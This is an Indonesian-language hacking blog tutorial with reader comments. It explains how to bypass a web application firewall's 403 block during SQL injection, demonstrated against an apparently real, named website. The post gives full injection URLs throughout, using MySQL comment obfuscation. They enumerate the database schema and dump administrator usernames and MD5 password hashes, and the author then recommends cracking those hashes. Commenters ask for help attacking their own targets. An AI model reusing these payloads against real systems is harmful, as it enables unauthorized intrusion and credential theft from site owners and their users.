HEADLINE NEWS

Cara Bypass Sql Injection 403 Forbidden


Mumpung ada target nih, di postingan kali ini gw mau ngejelasin tutorial bagaimana Cara Bypass Sql Injection 403 Forbidden.

Oke langsung saja, disini gw udah ada target dan berikut target gue,
https://tisplanet.com/service-item.php?id=3

Di penjelasan kali ini gw ga akan ngejelasin sedetail mungkin.
Karena ditutorial ini mungkin kalian sudah pada paham basic sqli, jadi langsung ke inti permasalahannya saja ya.

Oke baiklah kita lanjutkan, gw asumsikan udah ke tahap union+select
Gue disini setelah melakukan order+by untuk mendapatkan jumlah column dan ketika mau masukan query union+select ternyata malah kena security waf 403 Forbidden.


Untuk cara bypassnya cukup kita menambahkan beberapa karakter mysql-comments. Di target gw disini yang kena waf di union+select jadi kita tinggal menambahkan beberapa karakter mysql-comments,

Contoh,
union+select
Kita tambahkan mysql-commentsnya jadi,

/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/

Nahh jadi contohnya seperti ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--+

Lihat digambar dibawah ini, bypassed.


Terus kalo udah tau angka magicknya yang keluar, selanjutnya tinggal masukan diosnya. Gue pilih angka 4 untuk dikasih dios berikut perintah lengkapnya,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8--+

Kena 403 Forbidden lagi anjirr mari kita bypass.


Oke berarti yang harus dibypass adalah diosnya, karena tadi pas mau dikasih dios malah kena waf 403 forbidden.

Untuk bypass diosnya sama seperti waktu bypass union+select tinggal menambahkan karakter mysql-comments. Lebih jelasnya seperti ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8--+


Bypass sukses, lihat gambar diatas gan.

Selanjutnya tinggal ngedump username beserta passwordnya seperti ini,

https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),5,6,7,8--+


Nah tuh keluar user dan passnya tapi password masih terenkripsi jenis md5, jadi harus dicrak atau hash biar bisa mengetahui password yang aslinya.

Oke sekian dulu dari gue, semoga bermanfaat.

Previous
« Prev Post
Show comments
Hide comments
19 comments:
Tulis Komentar
  1. Kak cara nambahin mysql-coments gimana. Soalnya itu sama sebelum bypass dios dan sesudah bypass dios nya di blog nya kak

    ReplyDelete
  2. Ya tergantung dibagian mana yang harus dibypass tinggal dimanin aja.

    ReplyDelete
  3. Bang gue masih gak ngerti
    tolong bantu dong

    ReplyDelete
    Replies
    1. Bagian mana yang belum ngerti, saya juga binggung.

      Delete
  4. Replies
    1. Oh maaf saya lagi bales, gak punya wa bang, fb aja ada kok.

      Delete
  5. gue demen klo yg punya blog interactiv gini,
    lanjutkan mas brow,
    gue pantau ja,belum ada yg demen artikelnya

    ReplyDelete
    Replies
    1. Maturnuwun mas brow, hooh ini belum ada yang demen hehe gkpp mas.

      Delete
  6. Kakkkkkk Dios site yg mau ku Inject GK bisa ke bypass..
    Order by sama union select nya udah dapet ..tp bypass dios nya belom

    ReplyDelete

Contact Form

Name

Email *

Message *